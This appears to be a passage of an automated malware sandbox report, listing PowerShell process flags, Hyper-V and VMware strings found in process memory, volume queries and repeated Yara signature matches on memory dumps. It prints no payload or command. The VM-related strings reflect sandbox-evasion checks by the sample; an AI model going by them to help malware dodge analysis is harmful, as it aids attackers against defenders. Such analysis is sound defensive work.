Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp |
Binary or memory string: Hyper-V RAWX |
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp |
Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. |
Source: SpeechRuntime.exe, 00000015.00000003.407826903.00000255BD33C000.00000004.00000001.sdmp |
Binary or memory string: Hyper-V RAW0 |
Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp |
Binary or memory string: Hyper-V RAW |
Source: mshta.exe, 00000026.00000003.498767463.0000022639476000.00000004.00000001.sdmp |
Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/ |
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp |
Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service. |
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp |
Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported. |
Source: SpeechRuntime.exe, 00000015.00000003.404478120.00000255BD348000.00000004.00000001.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp |
Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service. |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: Yara match |
File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY |